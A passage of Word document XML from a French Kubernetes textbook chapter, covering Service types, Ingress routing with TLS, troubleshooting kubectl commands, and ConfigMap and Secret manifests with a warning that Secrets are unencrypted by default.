        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="78" name="Picture 78"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f76.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.76 — Du pod au client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.243 — Cinq types de Service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49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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ClusterIP</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Interne au cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Communication entre services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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NodePort</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Un port sur chaque nœud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Développement, cas particulier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LoadBalancer</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Fournisseur cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exposition directe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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ExternalName</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Alias DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Service externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Headless</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Aucune IP virtuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accès direct aux pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un Service interne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apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Service</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type: ClusterIP</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: http</w:t>
        <w:br/>
        <w:t xml:space="preserve">      port: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">      targetPort: 3000</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sessionAffinity: None</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SÉLECTEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un Service ne référence pas des pods par leur nom, mais par leurs étiquettes. Toute modification d'étiquette peut retirer un pod du Service sans le supprimer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Vérifier quels pods sont sélectionnés</w:t>
        <w:br/>
        <w:t>kubectl get endpointslices -n production</w:t>
        <w:br/>
        <w:t>kubectl describe service api -n production</w:t>
        <w:br/>
        <w:t>kubectl get pods -n production --show-labels | grep app=api</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UN SERVICE SANS POINT DE TERMINAISON</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kubectl get endpoints</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> renvoie une liste vide, le sélecteur ne correspond à aucun pod prêt. C'est la cause la plus fréquente d'un 503 : le Service existe, mais il ne sait pas où envoyer le trafic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>67.2 Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un Ingress décrit un routage HTTP par nom d'hôte et par chemin. Il nécessite un contrôleur d'ingress, qui est le composant réellement exposé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un ingress complet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apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: Ingress</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: site</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t xml:space="preserve">  annotations:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cert-manager.io/cluster-issuer: letsencrypt-prod</w:t>
        <w:br/>
        <w:t xml:space="preserve">    nginx.ingress.kubernetes.io/proxy-body-size: "10m"</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ingressClassName: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tls:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - hosts: ["exemple.fr"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      secretName: exemple-fr-tls</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - host: exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">      http:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        paths:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - path: /api</w:t>
        <w:br/>
        <w:t xml:space="preserve">            pathType: Prefix</w:t>
        <w:br/>
        <w:t xml:space="preserve">            backend:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">                port:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                  number: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - path: /</w:t>
        <w:br/>
        <w:t xml:space="preserve">            pathType: Prefix</w:t>
        <w:br/>
        <w:t xml:space="preserve">            backend:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                name: web</w:t>
        <w:br/>
        <w:t xml:space="preserve">                port:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                  number: 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.244 — Cinq champs et leurs pièges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91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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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304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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ingressClassName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contrôleur utilisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Absent → ingress ignoré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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pathType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Mode de correspondance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Prefix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> souvent attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tls.secretName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Certificat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Doit exister dans le même namespace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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annotations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Réglages du contrôleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Spécifiques au contrôleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom de domaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Doit correspondre au DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre vérifications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Vérifier l'ordre des couches</w:t>
        <w:br/>
        <w:t>kubectl get ingress -n production</w:t>
        <w:br/>
        <w:t>kubectl describe ingress site -n production</w:t>
        <w:br/>
        <w:t>kubectl get svc -n ingress-nginx</w:t>
        <w:br/>
        <w:t>curl -H "Host: exemple.fr" http://&lt;ip-du-controleur&gt;/api/health</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CONTRÔLEUR D'INGRESS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Composant qui surveille les objets Ingress et reconfigure un proxy (Nginx, Traefik, Envoy) en conséquence. Sans lui, un Ingress n'a aucun effet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>67.3 Configuration externe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une image ne doit pas contenir la configuration de l'environnement. ConfigMap porte les valeurs non sensibles, Secret les valeurs sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une ConfigMap mixte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apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: ConfigMap</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api-config</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>data:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  LOG_LEVEL: "info"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  CACHE_TTL: "300"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  app.properties: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    feature.newMenu=true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    feature.betaBanner=false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un Secret minimal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apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Secret</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api-secret</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>type: Opaque</w:t>
        <w:br/>
        <w:t>stringData:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  DATABASE_URL: postgres://app:secret@db:5432/app</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UN SECRET N'EST PAS CHIFFRÉ PAR DÉFAUT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les secrets Kubernetes sont encodés en base64 et stockés dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>etcd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Sans chiffrement au repos ni contrôle d'accès strict, ils sont lisibles par toute personne ayant accès à l'API. Utilisez un gestionnaire de secrets externe pour la production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
